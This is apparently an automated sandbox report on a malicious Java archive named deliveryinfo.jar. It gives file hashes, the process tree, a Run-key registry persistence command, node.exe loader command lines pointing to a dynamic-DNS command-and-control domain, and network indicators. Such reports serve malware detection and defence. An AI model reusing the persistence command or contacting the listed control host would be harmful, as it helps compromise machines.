
deliveryinfo.jar

Full analysis: https://app.any.run/tasks/69b5f90c-a108-492e-91e2-cc47f6913d4f
Verdict: Malicious activity
Analysis date: September 30, 2020, 02:49:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/java-archive
File info: Java archive data (JAR)
MD5: 724141C6922AB8E19C262D269AA8AEE1
SHA1: 0D2BF53FA5138AA22B1585F5C5093DFBE65DFCD0
SHA256: A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D
SSDEEP: 12288:whSM3uQPBuy9mwsG+BXT4zsvuXEAr/qWy5khwG/:whSUuQpBxsG+NT4dXrriWGSH/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • reg.exe (PID: 2432)
  • SUSPICIOUS

    • Executes JAVA applets

      • javaw.exe (PID: 3656)
    • Executable content was dropped or overwritten

      • javaw.exe (PID: 3360)
    • Creates files in the user directory

      • javaw.exe (PID: 3360)
    • Application launched itself

      • javaw.exe (PID: 3656)
      • node.exe (PID: 3460)
      • node.exe (PID: 3132)
    • Starts CMD.EXE for commands execution

      • node.exe (PID: 3932)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 2788)
    • Reads CPU info

      • node.exe (PID: 3932)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • javaw.exe (PID: 3360)
No Malware configuration.

TRiD

.jar | Java Archive (78.3)
.zip | ZIP compressed archive (21.6)

EXIF

ZIP

ZipFileName: META-INF/
ZipUncompressedSize: -
ZipCompressedSize: 2
ZipCRC: 0x00000000
ZipModifyDate: 2020:09:25 16:24:26
ZipCompression: Deflated
ZipBitFlag: 0x0808
ZipRequiredVersion: 20
Total processes: 42
Monitored processes: 7
Malicious processes: 0
Suspicious processes: 5

Behavior graph

Processes as rendered in the graph, in order: start → javaw.exe (no specs) → javaw.exe → node.exe → node.exe (no specs) → node.exe → cmd.exe (no specs) → reg.exe

Process information

PID: 3656
CMD: "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\deliveryinfo.jar"
Path: C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe
Parent process: explorer.exe
User: admin
Company: Oracle Corporation
Integrity Level: MEDIUM
Description: Java(TM) Platform SE binary
Exit code: 0
Version: 8.0.920.14

PID: 3360
CMD: "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar C:\Users\admin\AppData\Local\Temp\91203cef.tmp
Path: C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe
Parent process: javaw.exe
User: admin
Company: Oracle Corporation
Integrity Level: MEDIUM
Description: Java(TM) Platform SE binary
Exit code: 0
Version: 8.0.920.14

PID: 3460
CMD: C:\Users\admin\node-v14.12.0-win-x86\node.exe - --hub-domain hazeman222.duckdns.org
Path: C:\Users\admin\node-v14.12.0-win-x86\node.exe
Parent process: javaw.exe
User: admin
Company: Node.js
Integrity Level: MEDIUM
Description: Node.js: Server-side JavaScript
Exit code: 0
Version: 14.12.0

PID: 3132
CMD: C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.org
Path: C:\Users\admin\node-v14.12.0-win-x86\node.exe
Parent process: node.exe
User: admin
Company: Node.js
Integrity Level: MEDIUM
Description: Node.js: Server-side JavaScript
Exit code: - (still running at end of analysis)
Version: 14.12.0

PID: 3932
CMD: C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.org
Path: C:\Users\admin\node-v14.12.0-win-x86\node.exe
Parent process: node.exe
User: admin
Company: Node.js
Integrity Level: MEDIUM
Description: Node.js: Server-side JavaScript
Exit code: - (still running at end of analysis)
Version: 14.12.0

PID: 2788
CMD: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "75f43e1b-f848-4a9d-9715-4f0bfcbdd71a" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\"""
Path: C:\Windows\system32\cmd.exe
Parent process: node.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2432
CMD: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "75f43e1b-f848-4a9d-9715-4f0bfcbdd71a" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\""
Path: C:\Windows\system32\reg.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Registry Console Tool
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Registry activity

Total events: 39
Read events: 38
Write events: 1
Delete events: 0

Modification events

(PID) Process: (2432) reg.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: 75f43e1b-f848-4a9d-9715-4f0bfcbdd71a
Value: cmd /D /C "C:\Users\admin\qhub\node\2.0.10\boot.vbs"
Files activity

Executable files: 2
Suspicious files: 2
Text files: 3 668
Unknown types: 7

Dropped files

PID | Process | Type | Filename

3360 | javaw.exe | - | C:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\node.exe
  MD5: - | SHA256: -

3360 | javaw.exe | text | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
  MD5: 9FF345D67D3E86AA13748F32859F0623 | SHA256: D580EB3395C1986C8BE63EA57F27C03102506A465A4B060C6FA252DB908BDE09

3656 | javaw.exe | text | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
  MD5: 3B0324B3E0F429E28588DE1DF7C625AA | SHA256: 9660032A03EA9330665C227ECDB00A0C316F73914C3B684A142E805F7AE0DC2C

3656 | javaw.exe | java | C:\Users\admin\AppData\Local\Temp\91203cef.tmp
  MD5: 724141C6922AB8E19C262D269AA8AEE1 | SHA256: A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D

3360 | javaw.exe | text | C:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\node_modules\npm\.mailmap
  MD5: 50FF5F4745B5210D1DDC6CB3AD21216B | SHA256: EC219650D5ED44D58B1F6CD6E8CCC116E118D7569E09ED19E9B80F5C8BE87D5B

3360 | javaw.exe | text | C:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\node_modules\npm\.licensee.json
  MD5: B133415ABE39E5C1865AAD84712B3941 | SHA256: 66218BC67A524799BA7CCAD7C493A8D24EEED81C07BED24E0C3034ABA6014061

3360 | javaw.exe | text | C:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\node_modules\npm\.travis.yml
  MD5: 3A7ED115415E15A00FC5911C72DA7812 | SHA256: B4080A2F674C7036830858C9EF6731BE83CC210B2C13ADE7CC4C9567163615CC

3360 | javaw.exe | text | C:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\nodevars.bat
  MD5: E6636C5B093F5CC13DFB7508305B8D8B | SHA256: A2B020E2F641524C6FD1B8EBBCD9EE03C7DC44009F2B78E701E773AD048BE9A5

3360 | javaw.exe | text | C:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\install_tools.bat
  MD5: 2CD17E6D9A33A0BD00C2E18E6D41BC6F | SHA256: C7C05DE977EEFD931B54B482405C87A2F002AF3BC83A9C2FECA21B05915983B9

3360 | javaw.exe | dbf | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\83aa4cc77f591dfc2374580bbd95f6ba_90059c37-1320-41a4-b58d-2b75a9850d2f
  MD5: C8366AE350E7019AEFC9D1E6E6A498C6 | SHA256: 11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
Network activity

HTTP(S) requests: 0
TCP/UDP connections: 6
DNS requests: 3
Threats: 0

HTTP requests

No HTTP requests

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3460 | node.exe | 94.156.189.108:443 | hazeman222.duckdns.org | BelCloud Hosting Corporation | BG | unknown
3932 | node.exe | 94.156.189.108:443 | hazeman222.duckdns.org | BelCloud Hosting Corporation | BG | unknown
3360 | javaw.exe | 104.20.22.46:443 | nodejs.org | Cloudflare Inc | US | shared
3932 | node.exe | 95.217.228.176:443 | wtfismyip.com | Hetzner Online GmbH | DE | malicious

DNS requests

Domain | IP | Reputation
nodejs.org | 104.20.22.46, 104.20.23.46 | whitelisted
hazeman222.duckdns.org | 94.156.189.108 | malicious
wtfismyip.com | 95.217.228.176 | shared

Threats

PID | Process | Class | Message
- | - | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2 ETPRO signatures are available in the full report.
No debug info